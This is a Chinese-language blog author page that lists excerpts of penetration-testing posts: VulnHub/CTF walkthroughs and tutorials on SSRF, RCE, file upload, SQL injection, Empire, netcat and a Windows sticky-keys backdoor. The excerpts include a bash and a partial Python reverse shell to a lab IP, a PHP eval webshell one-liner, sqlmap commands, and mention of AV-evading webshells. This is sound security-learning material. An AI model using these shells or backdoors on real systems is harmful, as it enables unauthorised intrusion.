自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(82)
  • 收藏
  • 关注

原创 个人博客说明

更多详细,完整图片的文章还请师傅们动动小手到博客园去看吧。本人博客主要发布平台为博客园。

2024-02-07 21:46:46 386 1

原创 37、Tomato(VulnHub)

Tomato一、nmap2211是ssh的端口,21的ftp也不是弱密码二、web渗透随便看看目录爆破/seclists/Discovery/Web-Content/common.txt/antibot_image/antibots/readme.txt发现该站点存在反爬机制/antibot_image/antibots/info.php提示我们该网页存在...

2024-04-17 12:53:00 455

原创 Brainpan(VulnHub)

Brainpan1、nmap2、web渗透随便看看目录爆破使用不同工具,不同字典进行爆破9999端口分析10000端口分析字符串信息中,提示这个程序不能运行在DOS模式下,然后有32个A,还有一行关于复制字节到缓冲区的信息,还有一行比较奇怪的字符shitstorm,有可能会是密码,接下来就是之前浏览器看到的ascii图案。3、常规的缓冲区溢出漏洞分析与...

2024-04-14 10:29:00 1014

原创 5、Hackademic-RTB1(VulnHub)

Hackademic-RTB1一、nmap扫全端口会爆炸,暂时使用默认先扫描出两个二、web渗透随便看看简单目录爆破/Hackademic_RTB1/根据界面提示,我们可以来到这个目录源码处发现框架再次目录爆破wscan扫描WordPress 1.5.1searchsploit/wp-content/plugins/在目录爆破中发现插件目录,这...

2024-04-10 12:24:00 319

原创 daybreak简单使用

daybreak简单使用B/S架构启动or关闭daybreak# 启动方式一:chmod + x nserver_linux_amd64nserver_linux_amd64 server - tls - p 23333 &方式二:./install.sh#关闭systemctl stop daybreak.service改完端口或者其他配置文件要记得重启dayb...

2024-04-05 09:38:00 272

原创 SSRF漏洞

Web渗透_SSRF漏洞一、介绍SSRF漏洞SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没...

2024-04-04 20:46:00 541

原创 17、Connect-the-dots(VulnHub)

Connect-the-dots一、nmapcat ports | grep open | awk -F '/' '{print$1}' | paste -sd ',' > nmap_open_port_total.txt二、ftp渗透没啥三、web渗透随便看看图片隐写目录爆破没错,web端给我们的提示就是去找备份/backupsbootst...

2024-04-02 11:57:00 248

原创 Empire使用

Empire使用①Empire简单介绍Empire是一个纯粹的PowerShell开发后代理,基于加密安全的通信和灵活的体系结构构建。Empire实现了运行PowerShell代理的功能,而无需powershell.exe,从关键记录器到Mimikatz的可快速部署的利用后模块,以及适应性强的通信以逃避网络检测,所有这些都封装在以可用性为重点的框架中。它于2015年在BSidesLV上首次...

2024-03-29 12:47:00 687

原创 7、billub0x(VulnHub)

billub0x一、nmap二、web渗透随便看看万能密码没戏bp抓包导成文件sqlmapsqlmap -r sql.txt --batch --dbs --random-agent -p "un"sqlmap -r sql.txt --batch --dbs --random-agent -p "ps"都没有什么结果目录爆破图片隐写一共有六张图...

2024-03-24 09:53:00 225

原创 Moonsec_Projet_7_Writeup

Moonsec_Projet_71、基础介绍1.1 网络拓扑图主机账号密码网卡IPWindows Server 2016administrator!@#QWE123vmnet17(web) | vmnet18192.168.0.144(www.moonlab.com) | 10.10.1.131Windows Server 2012administ...

2024-03-22 10:52:00 215

原创 Moonsec_Projet_7

这里面写入的aspx一句话木马最好是能够绕过安全狗和windows defender,我直接使用webshell生成器生成的蚁剑的aspx一句话木马,添加模板写入后,没被WAF,输入完点击确定,返回模板管理。这边也是搞了好久好久,对域控的一些操作还不是那么的明白,很多操作暂时也都学的迷迷糊糊的。问题还是有,就是还得在靶机上关闭。cs生成一个无免杀的木马,尝试蚁剑上传执行后,想着该关的都关闭了,运行木马程序后还是失败了。其实上边的目录爆破都是无用功,ip无法访问到这个环境的服务,我也是后边才发现这一点的。

2024-03-22 10:47:37 748 1

原创 IPC$管道通信

IPC$管道通信IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主机上的目录结构、用户列表等信息。实现IPS$管道通信的前提:被连接方需...

2024-03-19 17:11:00 352

原创 Fowsniff

发现爆破一次之后,对方会有限制,一段时间后又可以继续爆破。直接对user_passwd.txt进行爆破。

2024-03-19 17:09:19 339 1

原创 15、Fowsniff(VulnHub)

Fowsniff1、nmap2、web渗透简单浏览目录爆破发现可以文件,下载分析隐写分析无果,重新浏览80端口官网浏览pastebin.com/378rLnGi信息泄露制作字典发现爆破均无果hash识别john暴力破解hash发现爆破一次之后,对方会有限制,一段时间后又可以继续爆破。直接对user_passwd.txt进...

2024-03-18 19:18:00 123

原创 NC(netcat)基本操作

NC(netcat)基本操作前提:凭空是无法打开端口,那么我们就可以使用nc这个工具开启我们想要开放的端口。想开什么端口就可以开什么端口让别人进入。nc的启用Windows端nc使用方法Kali端nc使用方法基本使用方法一、监听/聊天工具方法:kali上使用nc去连接Windows7上的8000端口环境:Windows7(192.168.126.129),Kali(...

2024-03-17 19:14:00 722

原创 Windows粘滞键后门

此时假如该设备设置了这种粘滞键的话就可以通过调出cmd窗口(管理员状态)进行用户的创建,并将该用户归入到管理员组当中,就可以实现没有用户信息即可登入设备的操作——粘滞键后门。在C:/Windows/System32这个目录(系统进程的目录)下可找到粘滞键sethc这个应用程序(系统进程)。出现这种情况的原因是:由于刚刚已经将权限给到管理员,但管理员的权限始终未变化,所以还是不能修改文件名称(提高)。右键cmd属性打开发现Administrators这个组的成员根本没有对该文件的完全控制权限。

2024-03-14 14:58:18 424 1

原创 小工具icmpsh的基本操作

小工具icmpsh的基本操作基础介绍原理:通过icmp这个协议进行反弹一个shell前提条件:Kali(192.168.126.134)与Windows7(192.168.126.129)靶机需要在同一个网段(内网)当中,可以进行通信操作流程1、github上下载资源,复制进Kali,进行解压GitHub - bdamele/icmpsh: Simple reverse ICMP s...

2024-03-10 20:19:00 293

原创 10、My_file_server_1(VulnHub)

My_file_server_1(VulnHub)1、nmap2、目录爆破gobusterdirbdirsearch3、文件服务器渗透PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.2| ftp-syst: | STAT: | FTP server sta...

2024-03-06 20:46:00 336

原创 RCE命令执行&代码执行漏洞

RCE命令执行&代码执行漏洞RCE命令执行漏洞RCE漏洞简介RCE(remote code/command execute) 远程代码/命令执行漏洞RCE漏洞是两个漏洞:代码执行漏洞 # 针对后端语言!命令执行漏洞 # 针对系统!如何产生在 Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串...

2024-02-27 17:42:00 264

原创 42种常见网站漏洞

42种常见网站漏洞,让你水得快速,水得专业转载:零漏安全 2024-01-10 12:29 发表于河南免责声明:由于传播、利用本公众号"零漏安全"所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号"零漏安全"及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉谢谢!碰瓷类型1、Nginx版本泄露风险名称Nginx版...

2024-02-09 21:54:00 993

原创 Prime(VulnHub)

刚刚发现有两个用户,saket加上获得的密码没法登入,使用victor用户加密码成功登入后台。当一个东西执行完成后,发现没什么效果,那么这里就要有一个思路。文件为什么执行,执行之后有什么效果,会实现什么东西。注意这里-n参数表示的换行符一定要注意,有换行和没有换行的md5值是不同的,如果不是很清楚可以两种都去尝试。这里告诉我们找到了正确的参数,又没说要继续做什么,那么这里就要有一个思路,看看有没有本地文件包含。enc目录有可写权限,又可执行无密码执行enc,可尝试提权。发现一个结果也没有,尝试把-n去掉。

2024-02-07 21:48:54 1919 1

原创 反序列化漏洞

反序列化漏洞什么是序列化、反序列化例子引入序列化是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象状态,重新创建该对象。简单的来讲:(含例子easy.php)序列化:把对象转换为字节序列的过程称为对象的序列化。( serialize )【类-->字符串,方便传输】O:1:"S"...

2024-02-06 09:28:00 379

原创 DC1(VulnHub)

DC1(VulnHub)1234、flag1提示flag1提示:Every good CMS needs a config file - and so do you.5、flag2提示flag2提示:Brute force and dictionary attacks aren't the only ways to gain access (and you WILL ne...

2024-02-05 00:16:00 344

原创 hackable II(VulnHub)

hackable II(VulnHub)1234567891011121314

2024-02-04 00:06:00 338

原创 Misdirection(VulnHub)

Misdirectionnmap扫描目录爆破80小探索searchsploit无果8080端口渗透反弹shellbash -i >& /dev/tcp/192.168.2.228/11111 0>&1python -c 'import socket,subprocess,os;s=socket.socket(socket.AF...

2024-02-03 23:51:00 342

原创 Upload-labs

Upload-labsUpload-labs_Pass-01-->绕过前端校验法一:关闭浏览器js的功能法二:通过先上传合法的文件后缀,在通过抓包进行文件后缀修改function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null ...

2024-01-30 00:41:00 836

原创 pikachu通关教程(暴力破解)

pikachu通关教程(暴力破解)①基于表单的暴力破解不用多说,直接常见用户、弱口令爆破即可。账号:admin 密码:123456账号:test 密码:test②验证码绕过(on client)提交请求,没有抓到包,说明验证码是前端校验,只要保证能过前端,后面的验证码将不进行校验(把验证码删掉都可)。前端校验绕过前端,当我们输入一次正常的验证码即可绕过设置爆破参数成...

2024-01-28 09:21:00 333

原创 文件包含漏洞

文件包含漏洞文件包含漏洞简介文件包含漏洞基础介绍文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。文件包含漏洞常见函数PHP当中有:include()、include_o...

2024-01-27 12:33:00 953

原创 upload-labs-main-v1.0

upload-labs-main-v1.0Pass-01【前端校验】解题wp (By:独立团孙德胜Alan)本Pass是客户端过滤,可以通过禁用JS的方式绕过!1、打开第一关2、上传一个普通的shell.php文件<?php @eval($_POST('Alan'));?>提示不允许上传3、分析代码发现是前端JS校验4、前端js验证的绕过对于前端js...

2024-01-26 09:46:00 788

原创 文件上传漏洞

文件上传漏洞文件上传漏洞简介文件上传漏洞出现在有上传功能的应用程序中。如果应用程序对用户的上传文件没有控制或者上传功能存在缺陷,攻击者可以利用应用程序的文件上传漏洞将木马,病毒等有危害的文件上传到服务器上面,控制服务器。文件上传漏洞产生的主要原因是:应用程序中存在上传功能,但是对上传的文件没有经过严格的合法性检验或者检验函数存在缺陷,导致攻击者可以上传木马文件到服务器。文件上传漏洞危害极...

2024-01-25 10:11:00 834

原创 web安全思维导图(白帽子)

web安全思维导图(白帽子)客户端脚本安全服务端应用安全白帽子讲web安全安全运营体系建设

2024-01-19 22:48:00 398

原创 sqlmap使用教程

SQLMAP是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多强大的功能,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。

2024-01-19 22:46:59 422 1

原创 Google Hacking语法总结

Google Hacking是利用谷歌搜索的强大,来在浩瀚的互联网中搜索到我们需要的信息。轻量级的搜索可以搜素出一些遗留后门,不想被发现的后台入口,中量级的搜索出一些用户信息泄露,源代码泄露,未授权访问等等,重量级的则可能是mdb文件下载,CMS未被锁定install页面,网站配置密码,php远程文件包含漏洞等重要信息。基本搜索:逻辑与:and逻辑或:or逻辑非:–完整匹配:“关键词”通配符:*?

2024-01-17 22:50:32 1897

原创 常见sql注入绕过方法

常见sql注入绕过方法目录常见sql注入绕过方法1、空格过滤绕过漏洞代码示例/**/绕过制表符绕过换行符绕过括号绕过`反引号绕过2、内联注释绕过【常见waf!!!】3、大小写绕过4、双写关键字绕过5、编码绕过漏洞示例代码双重URL编码绕过十六进制编码绕过Unicode编码绕过ASCII编码绕过6、等价函数字符替换绕过漏洞示例代码用like或in代替=逗号过滤等价函数7、逻辑符号替换8、宽字节绕...

2024-01-17 22:45:00 1895

原创 Redteam.lab_Writeup

CVE-2019-5736 是 runC 的 CVE 漏洞编号,runC 最初是作为 Docker 的一部分开发的,后来作为一个单独的开源工具和库被提取出来,在 docker 整个架构的运行过程中,Containerd 向 docker 提供运行容器的 API,二者通过 grpc 进行交互。因为这里socks模块只是将代理设置为监听的端口(默认是1080),即通过proxychains的流量都转给本地的1080端口,又因为这是MSF起的监听端口,所以通过代理走的流量也都能到达内网。

2024-01-15 14:00:08 882

原创 SSH隧道代理实验

1)kali虚拟机2)kali虚拟机/Ubuntu虚拟机/centos虚拟机3)Windows虚拟机。

2024-01-15 13:43:43 343

原创 《将博客搬至CSDN》

《将博客搬至CSDN》

2024-01-15 13:37:00 349

原创 CewlKid(VulnHub)_Writeup

这是因为它通常被认为是一个共享的、可写的目录,任何用户都可以在其中创建临时文件,而不需要担心权限问题。尝试使用cewl,可以给他的爬虫指定URL地址和爬取深度,还可以添加外部链接,接下来Cewl会给你返回一个字典文件。sudo -l 命令用于列出当前用户可以使用 sudo 命令执行哪些命令以及这些命令的权限级别。不过这似乎要登入进去才可以进行文件上传,现阶段这有点难顶!换一个密码,再抓包发现Token值不变,那么,尝试爆破密码。查看8080端口,发现有Login,我们点击进去看看。

2024-01-15 13:22:32 1812

原创 IMF_1(VulbHub)_WriteUp

为了防止缓冲区溢出这种情况的出现,在C库函数中,许多对字符串操作的函数都有其"n兄弟"版本,例如strncmp,strncat,snprintf……strncmp("dwqdq\n", "48093572", 8) = -1 ----正在将我提供的字符串与字符串48093572进行比较,在这种情况下导致=-1)nmap 192.168.126.167 -p7788,80 ----这时候7788端口开启!这边肯定好奇了,这儿为什么上传gif,但是可以执行php的命令,这部分的内容我们后边再说。

2024-01-15 10:57:30 923

原创 渗透测试 | 信息收集常用方法总结

渗透测试 | 信息收集常用方法总结简述几乎每一个学习渗透的安全人员,都会被告知,信息收集是渗透测试的本质,那事实果真如此嘛?答案是,是的!信息收集作为渗透测试的前期主要工作,说白了叫做确定目标,以达到制作渗透计划的目的,这是非常重要的,甚至有的时候,仅仅通过信息收集,就可以拿到目标的shell了。其实信息收集也是有分类的:分为主动信息收集+被动信息收集。主动信息收集,说白了,就是直接访问、...

2024-01-15 09:50:00 813

2022.8.26-王鼎杯-青龙组

2022.8.26-王鼎杯-青龙组

2022-08-29

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除